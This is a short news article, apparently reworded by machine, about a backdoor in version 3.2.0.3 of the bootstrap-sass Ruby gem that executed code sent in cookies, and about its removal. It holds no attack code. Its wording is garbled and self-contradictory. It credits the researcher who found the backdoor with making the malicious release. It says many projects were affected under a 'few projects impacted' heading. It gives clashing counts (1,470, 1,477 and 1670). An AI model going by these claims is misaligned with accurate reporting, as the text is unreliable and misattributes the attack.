Backdoor code in the popular Bootstrap – Sass Ruby library



Over 28 million times the Bootstrap-Sass Ruby library was downloaded. Only 1,470 times in the backdoor version.

Backdoor code was found in a popular Ruby library for interfaces within Ruby in rail applications that were used for frontend user interfaces. The buggy code was removed via the library update.

Bootstrap Sass, a Ruby package that provides developers the most popular version of the Bootstrap UI for developers today, is a library affected by this incident. The backdoor existence became evident on 27 March last week when Derek Barnes found that someone removed a library version (Bootstrap-Sass version 3.2.0.2) and released a new version immediately, some moments later, version 3.2.0.3.

The fact was that Barnes only made the change on RubyGems, a popular Ruby library repository, but not on GitHub, in which the source code of the library was being managed.

bootstrap-sass-backdoor

RUBY APPS TO REMOTES CODE EXECUTION

When examining the v3.2.03 code published in RubyGems, Barnes detected what he described as “interesting looking code,” which would load and execute a cookie file if it were embedded in rubies or rubies on the rails (popular Ruby framework).

The backdoor from RubyGems was removed on the same day it was reported. The Bootstrap-Sass team also revoked RubyGems for developers who thought they had compromised their account and used the malicious code to push.

Bootstrap-Sass v3.2.0.4 was also released yesterday, to remove any backdoor leftovers from RubyGems and GitHub. The update should also send the developer a notice to update their code for the new version and remove backdoors from existing projects.



FEW PROJECTS IMPACTED

However, there are many projects affected, as Bootstrap-Sass v3.4.1 was the latest version of this library and very few developers used its old branch. “A rapid analysis shows that approximately 1670 GitHub repositories were directly exposed to the malicious library,” said the cybersecurity company Snyk who also looked at the backdoor.

“This is a significant increase in the number of applications used as a transitive dependency.” The Bootstrap Sass library was downloaded from RubyGems almost 28 million times according to official RubyGems stats; however, these are historical stats and do not all reflect backdoor downloads. Downloads for backdoor version 3.2.0.3 at the time of writing are only 1,477.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.